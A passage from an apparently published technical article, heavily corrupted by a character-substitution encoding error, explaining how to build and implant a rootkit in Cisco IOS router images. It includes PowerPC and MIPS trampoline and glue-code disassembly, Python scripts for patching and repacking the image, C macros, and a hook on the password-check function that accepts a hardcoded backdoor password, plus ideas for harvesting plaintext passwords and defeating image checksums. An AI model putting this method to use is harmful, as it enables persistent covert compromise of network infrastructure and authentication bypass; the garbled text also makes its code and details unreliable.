+n so!e cases the 4-T- seg!ent per!issions 6in %hich the string
resi#es7 nee# to be change# to R$9 6Rea#,$rite,e9ecute7 because those
sections %ere preiously use# to allocate strings an# no co#e
e'ecution capability %as re.uire# )ro! the!*
+n case the attacker pre)erre# to create an a##itional section in the
i!age )ile" E&/ )ile hea#er !o#i)ication or any other operation on
the )ile sections or seg!ents" coul# be easily #one %ith the 0yEl)1D3
library specially create# )or this pro=ect*
+t is also possible to change )ile section per!issions to a## E9EC
using our 0yEl) as sho%n in the )ollo%ing e'a!ple?
)ro! pyel) i!port El)
)ro! sections i!port S</HE9EC+8STR
iosH)ilena!e C 'C2ED2,+,*P+8'
el) C El)6iosH)ilena!e7
R -ssu!ing that section nu!ber > is '*te't'
#ataHsec C el)*sections1>3
print '1,3 Ol# )lags? Ws' W #ataHsec*get/lagsString67
Page 19 of 37
R -##ing E9EC )lag
print '1,3 -##ing S</HE9EC+8STR )lag? Ws' W S</HE9EC+8STR123
#ataHsec*set/lags6#ataHsec*get/lags67 A S</HE9EC+8STR1037
print '1,3 8e% )lags? Ws' W #ataHsec*get/lagsString67
R $rite #o%n ne% )ile alues to the sa!e )ilena!e
R %ith '*ne%' e'tension a##e#*
el)*%rite/ile6iosH)ilena!e @ '*ne%'7
+!age !anipulation !ust be #one ery care)ully because it %ill be
relocate# a)ter the #eco!pression process an# any inali# !e!ory
re)erence coul# lea# to an e'ception resulting in a syste! crash*
+n the prece#ing paragraphs" a nu!ber o) !etho#s to insert the
rootkit co#e hae been !entione#" but they all hae so!ething in
co!!on ,, the rootkit co#e !ust be a##ressable )ro! current +OS
)unctions so the !e!ory a##ress selecte# to store the co#e is nee#e#*
"ootkit address book: $unctions to %call% in it
Since the !etho# selecte# to place our rootkit insi#e the +OS i!age
is to oer%rite e'isting strings" the )irst step is to rea# the
rootkit that %as preiously co!pile# to e'tract the necessary co#e
6this is achiee# using a script !entione# bello%7 )or the current
architecture %hether it's M+0S or 0o%er0C" an# %rite it at the
selecte# string location*
Once this is #one" the !e!ory a##ress that points to the en# o) the
rootkit co#e !ust be store# )or )urther operations on the i!age*
8e't" eery )unction o))set insi#e the preco!pile# rootkit C co#e
!ust be kno%n" so %hen an +OS )unction is patche# to call to its
rootkit counterpart" the a##ress o) the rootkit )unction !ust be
inserte# insi#e the shellco#e that %ill pro#uce the =u!p*
/or e'a!ple" %hen re#irecting e'ecution )lo% )ro! +OS i!age
chkHpass67 )unction call to the rootkit counterpart )unction" the
o))set o) the rootkit )unction insi#e the entire co!pile# rootkit
co#e is nee#e# to =u!p to its location relatie to the original +OS
)unction an# then return* +) the e'act location o) the rootkit
)unction is not kno%n" then !ost likely an e'ception %ill eentually
be generate#*
- !ore in,#epth e'planation %ill be gien later about this issue an#
%hy it's so i!portant* /or no%" let =ust )ocus on obtaining the
Page 20 of 37
rootkit co#e an# its )unction:s o))sets an# sy!bols*
To #u!p the co#e #isasse!bly to a )ile on #isk" XCC %ill be use# to
co!pile the rootkit co#e an# then taking a#antage o) E&/
!anipulation tools inclu#e# in the binutils package1203* - te't
output %ill be generate# using ob=#u!p utility1223 to #isasse!bly the
co#e an# obtain a !ap o) it's sy!bol locations*
8e't is a sa!ple output )ro! this tool?
4isasse!bly o) section *te't?
02800BD0 MchkHpass,0'BY?
2800BD0? B2 B) BE O) bcla, 28"BKcr>@so"BEOc J UPO/HU
02800BDB MchkHpassY?
2800BDB? DB 22 )) #0 st%u r2",B86r27
2800BD8? Qc 08 02 aE !)lr r0
2800BDc? D> e2 00 28 st% r>2"B06r27
2800Ba0? D0 02 00 >B st% r0"O26r27
****
2800O08? Qc 08 0> aE !tlr r0
2800O0c? 8> eb )) )8 l%z r>2",86r227
2800O20? Q# E2 Ob Q8 !r r2"r22
2800O2B? Be 80 00 20 blr
02800O28 MchkHpassH!#OY?
2800O28? DB 22 )) e0 st%u r2",>26r27
2800O2c? Qc 08 02 aE !)lr r0
2800O20? D> e2 00 28 st% r>2"2B6r27
2800O2B? D0 02 00 2B st% r0">E6r27
****
2800E20? Qc 08 0> aE !tlr r0
2800E2B? 8> eb )) )8 l%z r>2",86r227
2800E28? Q# E2 Ob Q8 !r r2"r22
2800E2c? Be 80 00 20 blr
2800E>0? BO B) BE O) *long 0'BOB)BEO) J *ascii UEO/HU
02800E>B MHstartY?
2800E>B? DB 22 )) e0 st%u r2",>26r27
2800E>8? D> e2 00 28 st% r>2"2B6r27
***
Those sy!bols containing the )unction na!es an# a##resses %ill be
parse# by a 0ython progra! specially create# to return the
appropriate in)or!ation* +n the a##resses 0'2800BD0 an# 0'2800E>0"
Page 21 of 37
t%o -SC++ strings can be obsere#*
Those t%o strings are !arker )lags set in the plain C rootkit co#e
an# use# by the scripts to e'tract the co#e in bet%een ,, %hich is
the rootkit co!pile# co#e )or the target architecture 6%hether it's
M+0S or 0o%er0C7 an# o) interest to us* This %ay the unnecessary co#e
is le)t behin# an# only a s!all a!ount o) co#e is kept to be inserte#
into the +OS i!age*
The resulting )ile containing #isasse!bly co#e" sy!bols an# opco#es
)or eery instruction %ill be processe# by a 0ython script giing a
0ython tuple ob=ect o) the t%o ele!ents as a result*
The )irst ele!ent 6ariable co#eHin#e'es7 is a 0ython #ictionary
ob=ect in#e'e# by )unction na!e an# containing the )unction:s
starting o))set as the secon# ele!ent o) the tuple* The secon#
ele!ent 6ariable co#eHinstructions7 contains a 0ython list ob=ect
%ith eery instruction an# the correspon#ing opco#e alues to %rite
into the selecte# string o) the +OS i!age* The relation bet%een the!
is the )ollo%ing?
co#eHin#e'es13 co#eHinstructions67
@,,,,,,,,,,,,,,,,,,@,,,,,,,@ @,,,,,,,,,,,@,,,,,,,,,,,,,,,,,,@
A /unction 8a!e AO))set A A Opco#e A +nstruction A
@,,,,,,,,,,,,,,,,,,@,,,,,,,@ @,,,,,,,,,,,@,,,,,,,,,,,,,,,,,,@
A chkHpass A 0 AM,,,,,,YA0'DB22))#0 A st%u r2",B86r27 A
A A A A A A
A chkHpassH!#O A >0 AM,,,,@ A ***6>0 ite!s bet%een7*** A
A A A A A A A
A openH)ile A 8O AM,@ @,YA0'DB22))#O A st%u r2",B>6r27 A
A A A A A A A
@,,,,,,,,,,,,,,,,,,@,,,,,,,@ A A ***6OO ite!s bet%een7*** A
A A A A
@,,,,YA0'Qc0>0>Q8 A !r r>"r0 A
A A A
A ***6!ore ite!s7*** A
@,,,,,,,,,,,@,,,,,,,,,,,,,,,,,,@
-s you can see" the #ictionary ob=ect calle# co#eHin#e'es uses the
)unction:s na!e as its key an# the correspon#ing alue is the o))set
to the secon# ob=ect calle# co#eHinstruction that contains the parse#
output %ith instructions an# its opco#es*
This %orks either on 0o%er0C an# M+0S plat)or!s because it uses the
output o) the 0ython script" %hich is al!ost the sa!e )or both
architectures 6the script takes care o) s!all #i))erences on the
output7*
Page 22 of 37
Code &oyeurism and fetishism
Once the key )unctions are )oun#" rootkit insertion %ill be #iscusse#
using a binary patching techni.ue on the +OS i!age* Once in control
o) the )unction" it %ill take #i))erent actions base# on the
para!eters passe# at run,ti!e*
&et's take )or e'a!ple the pass%or#,checking )unction* +n this case
the rootkit !ust take control at the beginning o) the )unction 6kno%n
as prologue7 to check i) the rootkit pass%or# %as entere#* +n that
case the original pass%or# check )unction %on't be e'ecute#"
other%ise it %ill be as i) nothing ha# happene#*
That !eans that so!e instructions 6architecture #epen#ent7 %ill be
oer%ritten at the prologue o) the )unction an# store# )or )urther
usage*
8e't is a co!!on )unction prologue )ro! an +OS running on 0o%er0C?
*te't?80>PEB>B st%u Wsp" ,0'286Wsp7 J create stack
*te't?80>PEB>8 !)lr Wr0 J !oe ret a##r to Wr0
*te't?80>PEB>C st!% Wr>0" 0'206Wsp7 J sae preious alues
*te't?80>PEBB0 st% Wr0" 0'2C6Wsp7 J store ret a##r on stack
*te't?80>PEBBB !r Wr>2" Wr> J !oe para!s to use
*te't?80>PEBB8 !r Wr>0" WrB J ***
*te't?80>PEBBC li Wr0" 0
*te't?80>PEBO0 st% Wr0" 0'28@arH206Wsp7
4ue to the nature o) the R+SC architecture 6#espite the #i))erences
bet%een M+0S an# 0o%er0C7 the return a##resses !ust be store# by the
)unction prologue because 6as a #i))erence to '8E7 it:s store# in a
register calle# &R 6&ink Register7 instea# o) in the stack* Saing
the return a##ress an# registers %hose alues !ust preail intact
a)ter the )unction returns is one o) the tasks o) the prologue*
+n or#er to take control o) the e'ecution )lo%" the )irst instruction
o) the original )unction o) +OS targete# )or re#irection 6in the case
o) 0o%er0C" the )irst t%o instructions )or +OS running on M+0S7 !ust
be oer%ritten %ith a =u!p to a location %ith speci)ic shellco#e
%hich %as preiously selecte# by replacing a #ebug string use# insi#e
the +OS*
The instruction that oer%rites the )unction prologue is calle#
trampoline an# %ill re#irect the e'ecution )lo% to a location kno%n
as glue code*
Page 23 of 37
The trampoline is responsible )or =u!ping i!!e#iately 6an#
uncon#itionally7 to attacker,speci)ic co#e that %ill !ake so!e stack
arrange!ents base# on a preiously kno%n nu!ber o) para!eters to be
passe# to the rootkit )unction an# ulti!ately call the appropriate
)unction in the rootkit co#e*
The glue code is responsible )or the )ollo%ing?
2* Saing the return a##ress* 4ue to the )act that the co#e )ro!
the tra!poline '=u!pe#' to the glue co#e" this is the a##ress o)
the instruction )ollo%ing the one that calle# the original +OS
)unction*
2* Storing the )unction para!eters currently allocate# in processor
registers into the stack*
>* -llocating space on the stack )or an e'tra )unction para!eter
nee#e# by the rootkit C co#e*
B* Calling the rootkit plain C co#e*
O* 0rocessing the return alue o) the rootkit C co#e to #eci#e
%hether to continue the e'ecution o) the original +OS )unction
or return #irectly to the caller*
E* +) the e'ecution o) the original )unction !ust continue" then
the original )unction call para!eters store# in the stack are
restore#" the oer%ritten instructions )ro! the original +OS
)unction are e'ecute#" an# )inally a =u!p to the instruction
ne't to the trampoline is per)or!e#*
Q* +) the e'ecution o) the original )unction !ust not be per)or!e#"
the alue at the !e!ory allocate# )or the e'tra para!eter is
copie# into the register that contains the return alue o) the
original )unction )ollo%e# by a =u!p to the return a##ress
store# in step nu!ber one*
This high leel e'planation is inten#e# to brie)ly e'plain the
)unctionality o) the glue co#e an# to e'press that it is a ital part
o) the bri#ge that co!!unicates the original +OS )unctions 6no%
suberte#7 %ith the counterpart rootkit )unctions %ritten in plain C*
The beginning o) the )unction" %hich %as preiously #etecte# using
strings re)erences 6)ro! neighbors or itsel)7 is locate# using +4-"
ha# its prologue oer%ritten %ith the tra!poline co#e*
Page 24 of 37
This is a co!!on techni.ue kno%n as hooking an# consists o)
intercepting a )unction call by re#irecting the co#e e'ecution to the
rootkit co#e )or )urther processing an# then returning to the
original point*
Pelo% is a high,leel graphic e'plaining the e'ecution path until it
reaches the rootkit co#e an# ho% the in)or!ation is processe#?
+OS caller chkHpass 6p7 Xlue co#e chkHpassH4+56p"i7
@,,,,,,,,,,,,,,,,,@ @,,,,,,,,,,,,,,,,,@ @,,,,,,,,,,,,,,,,,,,,,,@ @,,,,,,,,,,,,,,,,,@
A A A A A A A A
A r C chkHpass6p7 A,2,YA tra!poline A,,2,YA a## stack A >,,YA i) p CC 'l>>Q'? A
A A A A A store parent R- A A A i C true A
A i) r CC true? AM, A rest o) co#e AM,@ A store para!s p A A @,A return RET A
A login67 A A A *** A A A create para! i A A A A else? A
A else? A @,,A return legalHresA O A o C chkHpassH4+56p"i7A,@ A,A return CO8T A
A #enyHlogin67 A A A A A A )i' stack AM,,B A A
A *** A A A A A A i) o CC CO8T? A A A
@,,,,,,,,,,,,,,,,,@ A @,,,,,,,,,,,,,,,,,@ A A e'ec orig instruct A @,,,,,,,,,,,,,,,,,@
A @,,A return para!s p A
A A cont chkHpassH+OS A
A A else? A
@,,,,,,,M,,,,E,,,M,,,,,,,,,A r C i A
A =u!p to R- A
A A
@,,,,,,,,,,,,,,,,,,,,,,@
+n the )ollo%ing e'a!ple" the +OS )unction responsible )or pass%or#
checking is hooke# an# base# on the result 6%hether the pass%or# is a
back#oor pass%or# or not7" the e'ecution )lo% is re#irecte# again to
either inoke the original )unction co#e or to return #irectly to the
caller 6bypassing authentication7 as e'plaine# belo%?
2* - )unction insi#e the +OS calls the pass%or# ali#ation )unction
call chkHpass67* -t the beginning o) this )unction" using the
hooking techni.ue to apply the tra!poline's co#e" the rootkit
seizes control o) the e'ecution )lo%*
+n the case o) the 0o%er0C %e si!ply %rite a branch instruction
6b7 like the )ollo%ing?
*te't?80>PQDPB B8 4C C> DC b locH8228>4O0
The ne't e'a!ple coers the case o) the M+0S architecture %here
a =u!p instruction 6=7 %ill be %ritten at the )unction prologue"
)ollo%e# by a 8O0 instruction to aoi# proble!s %ith #elay,slots
on this architecture?
Page 25 of 37
&O-4?E0BE0-0B 08 O- OB PP = locHE2EDO2EC
&O-4?E0BE0-08 00 00 00 00 nop
This is the !otie %hy in +OS" %ith i!ages )or M+0S
architecture" t%o instructions on the prologue are oer%ritten*
2* The glue co#e is inoke# so that the steps preiously e'plaine#
take place* 8o% a #etaile# e'planation o) the shellco#e use#
%ill be sho%n )or calling a )unction that e'pects )our
para!eters" three o) %hich are the original )unction's
para!eters" an# the )ourth para!eter is the return alue 6this
alue is ignore# by the shellco#e i) the )unction #oesn't return
any alue" like in the case o) oi# )unctions7*
/ollo%ing is a co!plete #isasse!bly o) the glue co#e )or the
0o%er0C architecture?
*#ata?8228>4O0 locH8228>4O0?
*#ata?8228>4O0 !)lr Wr0 J Sae return a##ress
*#ata?8228>4OB st% Wr0" ,B6Wsp7 J Copy ret a##r into stack
*#ata?8228>4O8 st% Wr>" ,0'C6Wsp7 J Store para! 2
*#ata?8228>4OC st% WrB" ,0'206Wsp7 J Store para! 2
*#ata?8228>4E0 st% WrO" ,0'2B6Wsp7 J Store para! >
*#ata?8228>4EB a##i WrE" Wsp" ,8 J Xet a##ress o) para! B
*#ata?8228>4E8 st%u Wsp" ,0'2C6Wsp7 J Sae stack space )or para!s
*#ata?8228>4EC bl subH8228>PPB J +noke 4+5 plain C co#e
*#ata?8228>4Q0 a##i Wsp" Wsp" 0'2C J Restore allocate# stack
*#ata?8228>4QB c!p%i Wr>" 0 J Check i) RET(R8 to caller
*#ata?8228>4Q8 l%z Wr>" ,B6Wsp7 J Obtain ret a##ress store#
*#ata?8228>4QC !tlr Wr> J Copy ret a##r to register
*#ata?8228>480 be. locH8228>4D8HRETJ E'ec RET(R8 or CO8T co#e]
*#ata?8228>48B l%z Wr>" ,0'C6Wsp7 J Restore original para! 2
*#ata?8228>488 l%z WrB" ,0'206Wsp7 J Restore original para! 2
*#ata?8228>48C l%z WrO" ,0'2B6Wsp7 J Restore original para! >
*#ata?8228>4D0 st%u Wsp" ,0'286Wsp7 J E'ecute oer%ritten inst
*#ata?8228>4DB b locH80>PQDP8 J Continue a)ter tra!poline
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
*#ata?8228>4D8
*#ata?8228>4D8 locH8228>4D8HRET? R CO4E 9RE/? *#ata?8228>480R=
*#ata?8228>4D8 l%z Wr>" ,86Wsp7 J Set )unction return alue
*#ata?8228>4DC blr J Return to +OS caller
The co!!ents ne't to eery instruction in the aboe #isasse!bly
represent the step preiously #escribe# %hen the glue co#e %as
)irst intro#uce#*
Page 26 of 37
+t's i!portant to re!in# rea#ers at this point that the part o)
this shellco#e that storesIrestores the original )unction
para!eters %as #yna!ically calculate# by the +4-,0ython script*
+t's also %orth !entioning that the co!pile# rootkit co#e" %hich
%as place# in !e!ory that originally belonge# to a #ebug string"
%as success)ully e'ecute# allo%ing the attacker to achiee one
o) the !ost i!portant parts o) this rootkit ,, %hich is to
!aintain a uni.ue co#e base %ritten in plain C that %orks )or
both plat)or!s %ithout haing to take care o) architecture,
speci)ic #etails*
The M+0S co#e per)or!s the sa!e task as the 0o%er0C co#e but
%ith the correspon#ing M+0S instructions?
4-T-?E2EDO2EC locHE2EDO2EC?
4-T-?E2EDO2EC s% [ra" ,B6[sp7 J Copy ret a##r into stack
4-T-?E2EDO2/0 s% [a0" ,0'C6[sp7 J Store para! 2
4-T-?E2EDO2/B s% [a2" ,0'206[sp7 J Store para! 2
4-T-?E2EDO2/8 s% [a2" ,0'2B6[sp7 J Store para! >
4-T-?E2EDO2/C a##i [a>" [sp" 0'///8 J Xet a##ress o) para! B
4-T-?E2EDO>00 a##iu [sp" ,0'2C J Sae stack space )or para!s
4-T-?E2EDO>0B =al subHE2EDO2EB J +noke 4+5 plain C co#e
4-T-?E2EDO>08 nop J nop )or #elay,slot
4-T-?E2EDO>0C a##iu [sp" 0'2C J Restore allocate# stack
4-T-?E2EDO>20 l% [ra" ,B6[sp7 J Obtain ret a##ress store#
4-T-?E2EDO>2B be.z [0" locHE2EDO>>8J E'ec RET(R8 or CO8T co#e]
4-T-?E2EDO>28 nop J nop )or #elay,slot
4-T-?E2EDO>2C l% [a0" ,0'C6[sp7 J Restore original para! 2
4-T-?E2EDO>20 l% [a2" ,0'206[sp7 J Restore original para! 2
4-T-?E2EDO>2B l% [a2" ,0'2B6[sp7 J Restore original para! >
4-T-?E2EDO>28 a##iu [sp" ,0'28 J E'ecute 2
st
oer%ritten inst
4-T-?E2EDO>2C s% [s0" 0'286[sp7 J E'ecute 2
n#
oer%ritten inst
4-T-?E2EDO>>0 = locHE0BE0-0C J Continue a)ter tra!poline
4-T-?E2EDO>>B nop J nop )or #elay,slot
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
4-T-?E2EDO>>8
4-T-?E2EDO>>8 locHE2EDO>>8? R CO4E 9RE/? 4-T-?E2EDO>2BR=
4-T-?E2EDO>>8 l% [0" ,86[sp7 J Set )unction return alue
4-T-?E2EDO>>C =r [ra J Return to +OS caller
4-T-?E2EDO>B0 nop J nop )or #elay,slot
+t's also i!portant to note that the a##ress %here the glue co#e
starts is at the en# o) the rootkit co#e" so all the co#e is put
together in the sa!e !e!ory area 6an# hope)ully the sa!e !e!ory
page7*
Page 27 of 37
+n the scenario #escribe# aboe it is possible to #escribe the tasks
per)or!e# by the glue co#e by saying that it stores the return
a##ress o) the original )unction call" calls the rootkit )unction
%ith the sa!e argu!ents o) the +OS legiti!ate )unction" an# processes
the result o) the )unction call*
This result is nee#e# to #eter!ine i) e'ecution )lo% %ill return to
the instruction )ollo%ing the trampoline an# continue the original
path by e'ecuting the instructions that %ere oer%ritten %ith the
tra!poline 6in case that the pass%or# entere# is not the rootkit
pass%or#7" or return #irectly to the tra!poline's caller because no
!ore pass%or# ali#ation is nee#e# 6in case the pass%or# entere# is
the rootkit:s !aster pass%or#7" %hich !eans that the attacker is
logging in*
The glue code is crucial )or rootkit operations because so!e o) those
pain)ul steps !ight not be necessary i) the rootkit co#e %as
i!ple!ente# in pure asse!bly* +n the case o) 4+5 it %as i!ple!ente#
in plain C to allo% easy !aintenance*
8o% it's clear %hy those )e% lines o) special asse!bly instructions
calle# trampoline an# glue code %ere nee#e# to )ill the gap bet%een a
C )unction co!pile# 6%ith Position Independent Code7 )or the target
architecture an# e'tracte# to be inserte# 'as is' #irectly insi#e the
+OS i!age*
The a#antage o) this !etho# is that only one C co#e is !aintaine#
6%ith certain li!itations" o) course7 instea# o) t%o asse!bly co#es
that per)or! the sa!e actions on #i))erent architectures 6a M+0S co#e
an# a 0o%er0C co#e7*
'earning the a( b( (lain) C
The rootkit co#e %ill change accor#ing to the nee#s o) the attacker"
%hich !ay inclu#e hi#ing )iles" hi#ing connections" !aintaining
back#oors" cleaning logs" etc* ,, all o) the! proi#ing a co!plete
stealth operation #uring an attacker's isit*
Those )eatures %ill take )or! o) C )unctions an# once those
)unctions: co#e is co!pile#" their bytes %ill be nee#e# so they can
be inserte# into the +OS i!age* Put a proble! arises because the
co!pile# co#e is an E&/ )ile )or the target architecture an# this is
%here the )lags 6PO/Han# EO/H7 ,, !entione# in the 'rootkit a##ress
book' section 6the #u!p sa!ple inclu#e# those )lags7 ,, %ill be use#
to separate the bytes o) interest )or the attacker )ro! the rest o)
Page 28 of 37
the E&/ )ile*
Those )lags are =ust inline asse!bly !arkers like the )ollo%ing?
R#e)ine PO/H4+5HCO4E as!6U*ascii VUPO/HVUU7
R#e)ine EO/H4+5HCO4E as!6U*ascii VUEO/HVUU7
Those t%o !arkers %ere place# at the beginning an# at the en# o) a
source co#e )ile 6al%ays outsi#e o) e'isting )unctions7 so the
co!piler si!ply inclu#es the! an# then a 0ython script can take
a#antage o) this to #eli!it the necessary co#e )or the rootkit*
The rootkit also re.uire# that the strings %ere in the sa!e section
o) the co#e instea# o) #i))erent sections like they usually are
6*TE9T7 so a %ay to inclu#e the! ne't to the )unctions an# a %ay to
obtain their a##resses 6an# that those a##resses support 0+C ^
0osition +n#epen#ent Co#e7 %as absolutely necessary* Other%ise the
rootkit %oul#n't hae strings support an# that's not acceptable*
To a##ress this issue" inline asse!bly %as e!ploye# to put the ra%
strings besi#e a )unction an# then obtain the pointer to those
strings through this )unction using a shellco#e that resoles the
current )unction a##ress 6to allo% 0+C7 an# then a##s an o))set %hich
is architecture speci)ic*
The i#ea %as to create a )unction that containe# the string an# also
the shellco#e to return its !e!ory a##ress 6like a charK7 so the
)ollo%ing steps %ere nee#e#?
oi# psz0ass%or#6oi#7 II String pointer na!e
L
2* Co#e that obtains current 0C*
2* Store 0C into a ariable*
>* -## an o))set 6to point to inline as! instruction7 to point to
)unction's en#*
B* Return the ariable pointing to en# o) )unction6string begins
there7*
N
as!6U*ascii VU!y back#oor pass%or#VU7J II Our string
as!6U*byte 0U7J II 8ull ter!inator
$ith this sche!a" a !acro %as create# to re)erence the )unction
a##ress plus an o))set 6%hich is architecture speci)ic7 to aoi# the
)unction's co#e until the en# o) the )irst byte a)ter the epilogue*
Page 29 of 37
The epilogue length aries bet%een architectures so %e #eter!ine the
current %orking architecture using XCC internal #e)initions to obtain
the correct o))set alue*
The )ully )unctional !acros )or both 0o%er0C an# M+0S are sho%n
belo% in a !acro calle# STR+8XH4E/+8E*
Ri)#e) HH!ipsHH
R#e)ine HO//SET 0'>0
Reli) HH00CHH
R#e)ine HO//SET 0'>B
Ren#i)
Reli) HH!ipsHH
R#e)ine STR+8XH4E/+8E6na!e"content7 charK na!e6oi#7 V
L V
int ret C 0J V
int origHblrJ V
as!6U!oe W0" [raU V
?UCrU6origHblr77J V
as!6UnopU7J V
as!6Ubal @BJU7J V
as!6U!oe W0" [raU V
?UCrU6ret77J V
as!6U!oe [ra" W0U V
??UrU6origHblr77J V
return6charK7ret@HO//SETJV
N V
as!6U*ascii VUUcontentUVUU7JV
as!6U*byte 0U7J
Reli) HH00CHH
R#e)ine STR+8XH4E/+8E6na!e"content7 charK na!e6oi#7 V
L V
int retJ V
int origHblrJ V
as!6U!)lr Wr8JU7J V
as!6U!r W0" WWr8U V
?UCrU6origHblr77J V
as!6Ubl @BJU7J V
as!6U!)lr Wr8JU7J V
as!6U!r W0" WWr8U V
?UCrU6ret77J V
as!6U!r WWr8" W0U V
??UrU6origHblr77J V
as!6U!tlr Wr8JU7J V
return 6charK7ret@HO//SETJV
Page 30 of 37
N V
as!6U*ascii VUUcontentUVUU7JV
as!6U*byte 0U7J
Ren#i)
This !acro takes t%o para!eters" the )irst is the pointer na!e
6)unction na!e7 an# the secon# is the content 6the string itsel)7*
So" to use it re)er to that string 6get a pointer to it7 like any
other string*
- s!all #etail is that Unake#U attribute is not aailable )or those
target architectures an# that is %hy the o))set stu)) to aoi# the
prologue is nee#e#* Other%ise the )unction prologue an# epilogue
%oul#n't be inclu#e# by the co!piler*
Pelo% is an e'a!ple o) usage o) the string !acro?
STR+8XH4E/+8E6psz0ass%or#" U#ikHrulezU7
oi# !yRootkit/unction6int so!earg7
L
charK psz0ass C psz0ass%or#67J II /unction na!e as string pointer
II or
print)6U0ass%or# C WsU" psz0ass%or#677J II co!!on pointer usage
N
$ith the string issue sole#" the rest o) the rootkit co#e is si!ply
a plain C progra! like any other an# the only thing to keep in !in#
is that the rootkit's )unctions !ust )ollo% a )e% rules*
These rules are that rootkit )unctions !ust return an integer to
in#icate to the glue co#e" %hether to continue e'ecution o) the
original +OS )unction" or return to the caller ,, an# also !ust
inclu#e one para!eter !ore than the original +OS )unction %hich %ill
contain the return alue o) the original +OS )unction in case
returning to the caller is nee#e#*
uint chkHpassH4+56char Kinput"char Kcorrect"uint al"uintK hookHres7
L
II !yHstrc!p is also a rootkit )unction
i) 6!yHstrc!p6input" psz0ass%or#677 CC 07
L
KhookHresult C 2J II !aster pass%or# speci)ie#
return O0HRET(R8J
N
Page 31 of 37
return O0HCO8T+8(EJ
N
+n the aboe e'a!ple" the usage o) a )unction to return a string
pointer is sho%n" as %ell as inoking another rootkit )unction 6in
this case is !yHstrc!p )unction7*
+t is clear at this point that the rootkit )unctionality is only
li!ite# by the attacker's creatiity because it's like progra!!ing
anything else in C*
$unctioning without the others functions
- )unction that per)or!s pass%or# checking is use)ul to retriee
other users: pass%or#s in plain te't an# i) this in)or!ation coul# be
%ritten so!e%here 6!ay be a hi##en )ile on )lash )ile syste!7 or
trans!itte# oer a TC0 connection using +OS socket han#ling
capabilities" %oul# be o) great interest )or an attacker*
There are seeral )unctions besi#es the one !entione# aboe that a
rootkit !ust hookIpatch to take co!plete control o) the syste!*
Those )unctions inclu#e e.uialents o) )ile,han#ling )unctions like
rea#I%rite" socket han#ling like sen#Irec" an# +OS )unctions that
i!ple!ent the C&+ 6Co!!an# &ine +nter)ace7 co!!an#s that can alert
the syste! a#!inistrator o) unauthorize# access*
0ointers to those )unctions nee# to be use# )ro! the C rootkit co#e
to be able to e!ploy the! into the rootkit co#e*
This coul# be #one by creating stub )unctions in the C co#e that
contain a =u!p to the )unction's location insi#e" but this location
%ill only be resole# a)ter analyzing the +OS i!age %ith +4-*
To sole this proble!" the stubs )unction coul# be create# in the
co#e containing a call to an in#e' insi#e a =u!p table %hich coul# be
)ille# by a 0ython script %ith the a##ress o) the real )unction in
!e!ory*
Mo#ern co!pilers use this approach to #yna!ically resole the
a##resses o) library )unctions re)erence# by a user progra!" %hich at
co!pile ti!e are unkno%n to the co!pilerIlinker an# beco!e kno%n %hen
the progra! is e'ecute# an# the =u!p table is )ille# %ith the
Page 32 of 37
resole# 6current7 !e!ory a##resses*
Peing able to use +OS internal )unctions gies the rootkit a !ore
a#ance# leel o) stealth" an# allo%s )or capabilities that go )ar
beyon# si!ple )unction hooking*
/or e'a!ple" nor!al security proce#ures like #o%nloa#ing the +OS
i!age in a perio#ic !anner by the syste! a#!inistrator to per)or! a
checksu! 6like M4O" S<-2" etc*7 as part o) the co!pany security
process to #etect !o#i)ie# i!ages coul# be easily re#irecte# to an
e'ternal serer that contains an unaltere# i!age %ithout any
suspicion*
+t coul# een intercept the rea# )unction calls asking )or a chunk o)
the co!presse# i!age on )lash 6or any other !e#ia7 an# in that !o!ent
it #eco!presses the in)ecte# chunk" patches it %ith the original
bytes 6%hich %ere preiously store# on a )ile in the )lash )ile
syste! ,, assu!ing that those )unctions a##resses are kno%n by
preious analysis7 an# re,co!press it so it's returne# intact 6this
is possible since the co!pression algorith! can %ork %ith chunks o)
bytes instea# o) the entire )ile7*
-t this !o!ent" the #i))erence bet%een a lo% leel rootkit an# a
si!ple TC& script can be appreciate# because such actions like the
one !entione# aboe coul# neer be achiee# by a higher leel
rootkit*
One i!portant )eature o) the rootkit is that the hooking !etho#
#oesn't nee# any a##itional process running to per)or! those actions"
so listing processes is not going to help )or #etection because all
that 4+5 #oes is intercept )unction calls an# re#irect e'ecution )lo%
to per)or! certain tasks an# then continue at the a##ress a)ter the
re#irection takes place*
"eady( steady( go
$ith the rootkit co#e in place" it's ti!e to #u!p the ne%ly,patche#
+OS i!age" repack it %ith the original 6sel) #eco!pressing7 )ile
hea#er an# uploa# it to the target syste!*
Rea#ing the patche# +4- i!age an# %riting its content to a )ile can
be #one easily" as in the )ollo%ing e'a!ple?
Page 33 of 37
R Create a ne% )ile to %rite the change# bytes
)#Ht!p C open6'rootkitHcontent*t!p'" '%b'7
co#eH#u!p C ''
R +terate through eery byte change# in the original +OS i!age
R
R rootkitHa##ress contains initial rootkit a##ress %here preiously
R a #ebug string %as locate#*
R
R currentHen#E- contains the last !o#i)ie# i!age a##ress
R
)or ea in range6rootkitHa##ress" currentHen#E-" B7?
co#eH#u!p @C pack6'Y&'" getHlong6ea77
)#Ht!p*%rite6co#eH#u!p7
)#Ht!p*close67
This generate# )ile %ill later be !erge# %ith the original +OS
)ilena!e to create the #eco!presse# back#oore# +OS i!age*
8o% #etails %ill be gien about ho% to !erge the rea#y rootkit co#e
in the te!poral )ile %ith the original +OS i!age ,, because this is a
triial byte replace!ent operation an# the o))sets to apply the patch
on the original i!age can be obtaine# )ro! +4-*
The checksu! o) the patche# +OS i!age !ust be calculate# again
because no% that its content hae change# the ol# checksu! alues
%on't !atch*
- script in 0ython that i!ple!ents the checksu! algorith! #escribe#
at the beginning can be use# to recalculate the checksu! an# recreate
the sel) #eco!pressing +OS i!age using the original i!age hea#er
6)ro! the )irst byte to the en# o) the S/9 section7 an# obtain an
i!age rea#y to be uploa#e# to the #eice using a nor!al i!age upgra#e
proce#ure*
Other ways of !he $orce
+!age binary patching has been #iscusse# in #epth but a run,ti!e
!e!ory patching techni.ue is also possible using the X4P1223 stub
inclu#e# insi#e eery +OS i!age*
The X4P stub is the #ebugging inter)ace )or Cisco #eelopers %hich
allo%s the! to #ebug +OS processes* +t also allo%s re!ote i!age
#iagnostics because it's capable o) %orking oer a Telnet session as
Page 34 of 37
%ell as oer a Serial session establish on the console port*
This X4P stub is capable o) %orking in three #i))erent %ays?
0rocess e'a!ination? -llo%s !e!ory inspection an# processor
